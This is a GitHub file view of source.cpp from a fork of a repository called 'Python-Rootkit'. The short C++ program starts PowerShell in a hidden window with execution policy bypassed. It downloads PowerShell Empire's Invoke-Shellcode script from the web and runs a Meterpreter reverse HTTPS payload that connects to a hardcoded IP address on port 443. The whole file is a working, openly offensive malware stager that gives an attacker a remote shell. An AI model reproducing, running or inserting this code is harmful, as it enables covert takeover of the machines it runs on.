forked from 0xIslamTaha/Python-Rootkit
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsource.cpp
More file actions
19 lines (17 loc) · 793 Bytes
/
source.cpp
File metadata and controls
19 lines (17 loc) · 793 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#include <windows.h>
#include <ShellApi.h>
#include <stdio.h>
#include <iostream>
#include <string>
#include <io.h> // For access().
using namespace std;
int main ()
{
ostringstream os;
os << "-ExecutionPolicy ByPass -NoProfile -NonInteractive -WindowStyle Hidden -noprofile -windowstyle hidden iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 54.88.167.79 -Lport 443 -Force;";
string op = "open";
string ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShell.exe";
string param = os.str();
ShellExecuteA(NULL, op.c_str(), ps.c_str(), param.c_str(), NULL, SW_HIDE);
return 0;
}